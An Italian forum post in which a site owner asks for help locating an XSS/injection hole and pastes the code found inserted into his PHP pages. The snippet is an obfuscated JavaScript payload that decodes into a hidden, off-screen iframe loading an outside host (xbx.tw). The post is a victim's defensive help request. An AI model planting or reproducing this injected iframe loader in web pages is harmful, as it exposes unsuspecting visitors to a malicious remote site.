php e problemi con XSS (Cross-site scripting)

[HunterBlue]

Salve,
come da titolo ho un grosso problema con un sito e con falle XSS (Cross-site scripting), il problema è che non riesco a capire dove sia il buco.
Da quello che ho visto mi sembra di capire che il passaggio sia tramite gli include che faccio del menù e del footer del sito (che momentaneamente ho tolto).
Ho anche un form per il login alla pagina di amministrazione per l'upload dei files.
Ora ecco cosa mi ritrovo nelle varie pagine:

<? php echo '<script type="text/javascript">var XiLgdMoRSAbuUBAgpMkf = "uKNMv60uKNMv105uKNMv102uKNMv114uKNMv97uKNMv10 9uKN Mv101uKNMv32uKNMv119uKNMv105uKNMv100uKNMv116uKNMv1 04uKNMv61uKNMv34uKNMv52uKNMv56uKNMv48uKNMv34uKNMv3 2uKNMv104uKNMv101uKNMv105uKNMv103uKNMv104uKNMv116u KNMv61uKNMv34uKNMv54uKNMv48uKNMv34uKNMv32uKNMv115u KNMv114uKNMv99uKNMv61uKNMv34uKNMv104uKNMv116uKNMv1 16uKNMv112uKNMv58uKNMv47uKNMv47uKNMv120uKNMv98uKNM v120uKNMv46uKNMv116uKNMv119uKNMv47uKNMv105uKNMv110 uKNMv46uKNMv99uKNMv103uKNMv105uKNMv63uKNMv51uKNMv3 4uKNMv32uKNMv115uKNMv116uKNMv121uKNMv108uKNMv101uK NMv61uKNMv34uKNMv98uKNMv111uKNMv114uKNMv100uKNMv10 1uKNMv114uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNM v32uKNMv112uKNMv111uKNMv115uKNMv105uKNMv116uKNMv10 5uKNMv111uKNMv110uKNMv58uKNMv114uKNMv101uKNMv108uK NMv97uKNMv116uKNMv105uKNMv118uKNMv101uKNMv59uKNMv3 2uKNMv116uKNMv111uKNMv112uKNMv58uKNMv48uKNMv112uKN Mv120uKNMv59uKNMv32uKNMv108uKNMv101uKNMv102uKNMv11 6uKNMv58uKNMv45uKNMv53uKNMv48uKNMv48uKNMv112uKNMv1 20uKNMv59uKNMv32uKNMv111uKNMv112uKNMv97uKNMv99uKNM v105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv59uKNMv32uK NMv102uKNMv105uKNMv108uKNMv116uKNMv101uKNMv114uKNM v58uKNMv112uKNMv114uKNMv111uKNMv103uKNMv105uKNMv10 0uKNMv58uKNMv68uKNMv88uKNMv73uKNMv109uKNMv97uKNMv1 03uKNMv101uKNMv84uKNMv114uKNMv97uKNMv110uKNMv115uK NMv102uKNMv111uKNMv114uKNMv109uKNMv46uKNMv77uKNMv1 05uKNMv99uKNMv114uKNMv111uKNMv115uKNMv111uKNMv102u KNMv116uKNMv46uKNMv65uKNMv108uKNMv112uKNMv104uKNMv 97uKNMv40uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKN Mv116uKNMv121uKNMv61uKNMv48uKNMv41uKNMv59uKNMv32uK NMv45uKNMv109uKNMv111uKNMv122uKNMv45uKNMv111uKNMv1 12uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKN Mv48uKNMv34uKNMv62uKNMv60uKNMv47uKNMv105uKNMv102uK NMv114uKNMv97uKNMv109uKNMv101uKNMv62";var ChBcyUOSVHTsqfYTsNlK = XiLgdMoRSAbuUBAgpMkf.split("uKNMv");var ONFiOFOESykVglxfGMyb = "";for (var URUKxtepGQzUdEDsKRwd=1; URUKxtepGQzUdEDsKRwd<ChBcyUOSVHTsqfYTsNlK.length; URUKxtepGQzUdEDsKRwd++){ONFiOFOESykVglxfGMyb+=Stri ng.fromCharCode(ChBcyUOSVHTsqfYTsNlK[URUKxtepGQzUdEDsKRwd]);}document.write(ONFiOFOESykVglxfGMyb)</script>'; ? >

Spero possiate darmi una mano a capire cosa fare